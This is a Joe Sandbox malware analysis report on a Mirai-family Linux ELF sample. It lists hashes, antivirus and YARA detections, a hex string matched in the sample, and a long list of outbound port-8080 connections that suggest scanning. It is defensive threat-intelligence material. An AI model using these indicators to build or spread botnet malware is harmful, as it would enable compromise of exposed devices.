Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
CuruFoiJiK.elf

Overview

General Information

Sample name:CuruFoiJiK.elf
renamed because original name is a hash value
Original sample name:da7737b175d9705ae82eb0f44e062cc4.elf
Analysis ID:1365649
MD5:da7737b175d9705ae82eb0f44e062cc4
SHA1:237f4c70778c9facb36ad5c15c8bea79b9566464
SHA256:a5d0279b09187f79c867ef741fe1371809d222979c4f42b45e9f9c7cb6bf8297
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1365649
Start date and time:2023-12-21 17:00:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:CuruFoiJiK.elf
renamed because original name is a hash value
Original Sample Name:da7737b175d9705ae82eb0f44e062cc4.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@0/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:/tmp/CuruFoiJiK.elf
PID:5513
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
love you ~jun0
Standard Error:

Process Tree

  • system is lnxubuntu20
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
CuruFoiJiK.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    CuruFoiJiK.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      CuruFoiJiK.elfMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0xb610:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
        5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5513.1.00007f1d38017000.00007f1d38024000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
          • 0xb610:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
          5517.1.00007f1d38017000.00007f1d38024000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
            5517.1.00007f1d38017000.00007f1d38024000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 1 entries

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: CuruFoiJiK.elfAvira: detected
              Multi AV Scanner detection for submitted file
              Source: CuruFoiJiK.elfReversingLabs: Detection: 72%
              Source: CuruFoiJiK.elfVirustotal: Detection: 66%Perma Link
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.44.123.90:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 99.169.61.90:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 88.29.85.197:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 199.169.249.147:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 169.227.134.109:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 198.32.129.71:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.53.117.178:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 177.209.43.38:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 41.15.80.150:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 63.118.126.165:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 142.233.98.46:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 130.214.227.140:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 99.234.36.54:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 65.113.180.119:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 38.165.126.185:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 8.160.66.169:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 68.162.179.131:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 131.131.19.35:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 128.37.130.124:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 140.172.199.30:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 189.32.85.104:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 100.244.200.66:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 112.243.120.70:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 168.33.58.103:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 14.207.95.216:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 109.113.4.23:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 170.216.241.156:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 70.98.112.55:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 193.0.27.187:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.7.137.252:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 164.1.0.222:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 126.68.245.20:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 163.235.172.73:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 130.79.32.249:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 168.113.233.47:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 51.32.48.188:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 223.220.63.177:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 134.10.43.74:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.191.68.165:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 102.251.204.171:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 91.225.237.124:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 53.211.16.214:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 211.139.112.188:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.216.70.174:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 182.94.20.253:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 42.248.250.30:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 197.217.71.150:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 24.38.180.77:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 80.43.152.205:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 4.249.129.129:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 46.196.42.48:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 110.84.119.61:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.93.127.9:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 142.115.25.87:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 37.148.54.48:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 189.14.36.174:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 175.70.247.179:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 14.198.66.126:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 41.255.112.136:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.54.126.5:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 223.253.237.87:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 150.42.112.144:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 147.211.238.45:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 219.227.49.15:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.190.121.94:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 156.243.16.99:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 84.38.128.205:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 68.43.196.6:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 134.138.20.109:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 65.253.15.57:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 108.100.55.93:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 93.36.51.105:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 38.187.236.138:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 95.75.232.186:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 137.253.113.195:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 145.77.189.211:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 203.94.4.45:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 35.252.45.23:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 173.75.21.191:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 125.201.3.38:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 101.94.8.198:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 76.198.78.121:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 24.94.90.1:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 111.49.150.255:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 139.110.246.194:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 88.202.231.22:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.133.49.12:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 42.177.45.92:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 111.41.67.241:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 219.234.19.192:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 180.32.221.217:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 123.236.87.166:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 115.44.47.23:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 165.22.69.107:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 180.243.8.68:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 152.220.8.54:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 179.240.191.79:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 129.247.208.146:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 134.197.136.39:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 141.171.229.176:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 58.93.221.247:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 91.168.140.82:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 200.16.52.101:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 128.135.83.99:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 186.31.8.65:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 95.230.194.17:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 206.208.25.34:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 111.68.95.107:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 25.225.86.222:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 174.59.167.238:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 45.121.42.229:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.120.213.144:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 45.149.33.137:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 199.22.207.110:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 78.247.64.149:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 57.66.229.118:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 41.138.193.28:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 68.167.29.112:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 114.173.16.35:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 165.60.133.44:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 24.27.143.55:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 197.178.195.10:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 98.13.225.186:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 52.1.246.7:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 175.152.42.130:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 108.140.103.248:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 128.12.31.114:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 47.31.45.149:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 60.166.192.50:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.18.185.175:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 164.127.1.108:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 88.63.249.120:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 23.166.228.181:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 196.93.63.183:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 154.40.139.147:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 75.4.45.181:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 73.194.13.86:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 105.16.138.224:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 88.23.192.72:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 133.88.5.3:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 160.203.248.7:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 160.71.248.121:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 129.32.3.253:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 148.163.32.101:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 57.70.82.192:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 144.4.61.171:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 100.11.196.143:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 146.17.26.68:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 111.44.222.61:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 67.237.58.150:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 221.209.242.43:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 205.183.114.211:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 39.148.167.136:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 162.59.144.103:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 95.113.222.110:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 75.56.63.63:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 171.137.101.175:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 219.130.116.24:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 52.125.244.60:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 67.236.96.140:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 4.173.158.162:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 179.84.208.167:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 38.229.167.84:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 54.89.89.196:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 155.179.174.29:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 174.36.200.124:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 41.86.39.124:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 186.175.219.12:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 171.226.174.198:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 140.176.202.193:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 57.152.145.48:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 134.165.233.0:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 103.129.250.195:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 129.221.35.198:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 109.177.110.213:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 116.196.52.168:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 25.17.228.173:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 135.254.3.38:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 52.181.210.121:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 105.140.219.137:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 218.83.142.161:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 8.40.246.73:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 147.245.47.22:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 163.32.90.40:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 75.101.36.71:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 65.189.58.240:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 200.56.155.33:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 14.210.251.246:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 94.205.120.157:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 210.182.158.75:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 94.172.207.193:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 9.82.141.223:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 20.129.216.1:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 178.238.165.9:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 176.131.49.178:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 140.159.26.60:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 162.237.171.70:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 188.237.208.20:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 71.56.33.224:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 97.99.149.203:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 138.247.80.76:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 86.24.220.219:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 82.19.253.183:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 50.191.180.97:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 101.10.66.148:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 73.218.233.129:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 79.99.149.53:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 44.166.250.77:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 141.122.23.25:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 143.204.140.221:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 151.110.164.188:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 111.149.220.150:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.197.193.184:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.61.53.217:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 129.240.230.11:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 122.113.156.207:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 173.149.158.230:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 103.206.193.29:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 181.30.71.253:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 112.45.184.25:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 179.224.218.22:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 136.115.89.82:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 130.171.41.101:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 112.49.141.213:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 139.172.225.229:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 125.29.209.40:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 1.209.211.154:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 144.113.173.64:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 210.60.77.83:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 66.179.33.102:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 57.243.154.89:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 132.87.192.46:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 198.188.71.180:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 129.176.26.202:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 90.90.124.119:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 150.78.144.140:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 90.56.127.146:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 174.141.74.225:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 57.178.110.17:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 68.73.179.108:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 204.102.75.252:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 146.116.85.115:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 89.177.203.50:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 186.39.242.253:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 37.29.212.199:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 158.242.19.164:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 205.111.228.229:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 24.26.49.141:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 198.33.216.199:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 12.29.176.58:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 51.231.33.24:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 27.56.3.36:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 32.176.37.114:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 80.197.247.89:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 182.96.246.120:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 150.18.233.45:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 70.15.105.181:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 151.48.13.191:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 119.31.159.28:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 147.192.22.117:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 211.241.218.22:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 51.204.106.134:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 110.242.129.86:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 145.223.27.253:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 101.143.120.248:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 64.46.222.170:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 107.56.77.11:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 208.216.72.243:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 154.179.36.245:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 220.203.61.49:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 17.83.152.204:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 178.83.88.90:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 107.199.65.50:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 81.251.148.15:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 186.113.200.66:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 167.81.92.58:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 223.191.32.163:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 216.151.68.168:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 38.58.112.121:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 137.133.192.204:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 24.130.196.64:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 182.59.142.27:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 212.9.164.142:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 173.181.189.182:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 62.130.182.104:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 164.243.215.58:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 51.40.3.38:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 32.3.175.182:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 112.252.183.93:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 27.247.75.115:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 34.122.185.111:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 133.118.49.124:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 144.31.122.40:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 97.107.242.13:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 32.173.198.247:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 148.105.164.63:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 210.18.202.101:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 213.202.212.207:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 68.165.31.15:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 94.205.152.239:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 5.77.235.21:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 188.82.228.1:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 83.34.21.0:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 125.132.133.31:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 178.82.126.207:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 159.33.255.211:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 148.235.21.105:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 19.60.77.248:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 150.222.140.91:8080
              Source: global trafficTCP traffic: 192.168.2.15:61516 -> 186.85.140.153:8080
